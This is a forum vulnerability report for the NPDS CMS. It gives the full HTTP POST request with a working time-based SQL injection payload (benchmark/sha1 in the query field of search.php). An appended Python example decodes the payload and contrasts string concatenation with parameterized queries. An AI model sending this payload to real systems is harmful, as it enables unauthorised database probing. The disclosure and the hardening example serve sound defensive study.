
Author

Remote-Time Based SQL Injection
Anonymous
19853  

  Posted: 14-11-2014 19:10

Reporting a time-based SQL injection

Reported By - Narendra Bhati
Email - bhati.contact@gmail.com
Security Analyst @ Suma Soft. Pvt. Ltd
======================================

Time-based SQL injection HTTP request = which is taking time to respond, which makes me confirm that there is a SQL injection
===============================================
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: admin=; pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C7 5fabcf00a72c6c06c40ec432c44c158a90fe85b; Elgg_install=0vsakk8pm4ksu1je3fp48krjv0; Elgg=8ojmn31jmhn2sntglokbokm0t1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

query=asdads%3Cxss%3E')and%20benchmark(20000000%2csha1(1))--%20
===================================================================
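
Added example, not part of the original post and not NPDS code: it decodes the `query` value from the request above and shows why it only works when the search term is concatenated into the SQL text, and how a bound parameter keeps it inert. The table, the `LIKE` clause shape and the SQLite stand-in functions are assumptions made for illustration; the real `search.php` query is not shown on this page.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body exactly as posted in the report above.
BODY = "query=asdads%3Cxss%3E')and%20benchmark(20000000%2csha1(1))--%20"
SQLITE_FUNCTION = getattr(sqlite3, "SQLITE_FUNCTION", 31)  # authorizer action code


def search_term():
    """URL-decode the posted form field the way the server would."""
    return parse_qs(BODY)["query"][0]


def open_db(seen):
    """In-memory stand-in database (constructed); records SQL functions compiled."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE stories (title TEXT)")
    db.execute("INSERT INTO stories VALUES ('hello world')")
    # SQLite has no BENCHMARK()/SHA1(): register no-op stubs so the injected
    # text compiles and can be observed, without any real delay.
    db.create_function("benchmark", 2, lambda count, expr: 0)
    db.create_function("sha1", 1, lambda value: "stub")

    def authorizer(action, arg1, arg2, dbname, source):
        if action == SQLITE_FUNCTION:
            seen.add((arg2 or "").lower())  # arg2 carries the function name
        return sqlite3.SQLITE_OK

    db.set_authorizer(authorizer)
    return db


def functions_compiled(parameterized):
    """Return the SQL function names the engine compiled for one search."""
    seen = set()
    db = open_db(seen)
    term = search_term()
    if parameterized:
        # Hardened form: the term is bound as data and never parsed as SQL.
        sql, args = "SELECT title FROM stories WHERE (title LIKE ?)", ("%" + term + "%",)
    else:
        # Assumed vulnerable form: the term is pasted into the statement text.
        sql, args = "SELECT title FROM stories WHERE (title LIKE '%" + term + "%')", ()
    db.execute(sql, args).fetchall()
    db.close()
    return seen


if __name__ == "__main__":
    print("decoded term :", repr(search_term()))
    print("concatenated :", sorted(functions_compiled(False)))
    print("parameterized:", sorted(functions_compiled(True)))
```

In the concatenated case the `')` closes the string and the parenthesis, so `benchmark` and `sha1` are compiled as SQL; with the bound parameter the same bytes are only a search pattern.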



This article comes from NPDS

http://www.npds.org/viewtopic.php?topic=26189&forum=12